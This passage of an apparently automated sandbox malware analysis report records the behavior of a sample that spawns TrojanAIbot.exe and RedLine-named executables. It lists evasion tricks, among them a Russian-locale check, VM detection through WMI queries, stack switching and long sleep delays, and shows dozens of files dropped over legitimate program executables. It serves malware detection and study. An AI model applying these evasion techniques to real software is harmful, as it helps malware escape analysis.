                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Contains functionality to behave differently if execute on a Russian/Kazak computer
                        Source: C:\Windows\System32\alg.exeCode function: 5_2_006A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 5_2_006A52A0
                        Source: C:\Windows\System32\AppVClient.exeCode function: 11_2_006652A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 11_2_006652A0
                        Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_006F52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 23_2_006F52A0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 25_2_009952A0
                        Contains functionality to detect sleep reduction / modifications
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004440780_2_00444078
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Switches to a custom stack to bypass stack traces
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeAPI/Special instruction interceptor: Address: 538F254
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeMemory allocated: 4E10000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeMemory allocated: 1270000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeMemory allocated: 1AE70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\build.exeMemory allocated: 1570000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\build.exeMemory allocated: 32C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\build.exeMemory allocated: 30C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 1100000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2C80000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2A80000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2520000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 26E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2520000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2BE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2E10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2C30000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 26F0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2930000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2740000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeCode function: 4_2_00007FF848F34660 sldt word ptr [eax]4_2_00007FF848F34660
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWindow / User API: threadDelayed 4905Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWindow / User API: threadDelayed 4814Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7370
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1354
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 7153
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 2636
                        Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 483
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
